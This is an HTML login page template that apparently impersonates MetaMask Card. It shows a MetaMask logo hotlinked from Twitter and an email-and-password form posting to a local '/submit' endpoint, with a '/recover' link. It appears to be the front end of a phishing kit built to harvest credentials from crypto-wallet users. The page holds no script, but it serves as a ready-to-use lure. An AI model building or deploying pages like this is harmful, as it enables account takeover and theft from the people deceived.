<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />

    <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;600&display=swap" rel="stylesheet">
    <style>
        body {
            font-family: 'Inter', sans-serif;
            background-color: #323232;
            margin: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            color: #fff;
        }

        .container {
            background-color: #000000;
            padding: 40px;
            border-radius: 16px;
            max-width: 400px;
            width: 100%;
            text-align: center;
            box-shadow: 0 0 30px rgba(0, 0, 0, 0.6);
        }

        .logo {
            width: 90px;
            margin-bottom: -15px;
        }

        h1 {
            font-size: 20px;
            margin-bottom: 30px;
        }

        input[type="email"],
        input[type="password"] {
            width: 100%;
            padding: 12px;
            margin-bottom: 16px;
            border-radius: 8px;
            border: 1px solid #444;
            background: #2a2a2a;
            color: #fff;
            font-size: 14px;
        }

        .forgot {
            text-align: left;
            font-size: 13px;
            color: #2196f3;
            margin-bottom: 20px;
        }

        .forgot a {
            text-decoration: none;
            color: #2196f3;
        }


        .login-btn {
            width: 100%;
            padding: 12px;
            background: #007bff;
            color: white;
            border: none;
            border-radius: 24px;
            font-weight: 600;
            margin-bottom: 16px;
            font-size: 15px;
            cursor: pointer;
        }

        .error-message {
            flex: 1;
            padding: 10px;
            background: #780a0aac;
            margin-bottom: 16px;
            border: #ff0202ac;
            color: #fff;
            cursor: pointer;
            font-weight: 500;
        }
    </style>
</head>

<body>
    <div class="container">
        <img src="https://pbs.twimg.com/profile_images/1895186503443316736/EaIM9RTY_400x400.jpg" alt="MetaMask Logo"
            class="logo">

        <h1>Log in to your MetaMask Card account</h1>

        {% if error %}
        <div class="error-message">{{ error }}</div>
        {% endif %}

        <form action="/submit" method="post">
            <input type="email" name="email" placeholder="Enter your email address" required>
            <input type="password" name="password" placeholder="Enter your password" required>

            <div class="forgot"><a href="/recover">Forgot Password?</a></div>


            <button type="submit" class="login-btn">Log in</button>
        </form>
    </div>
</body>

</html>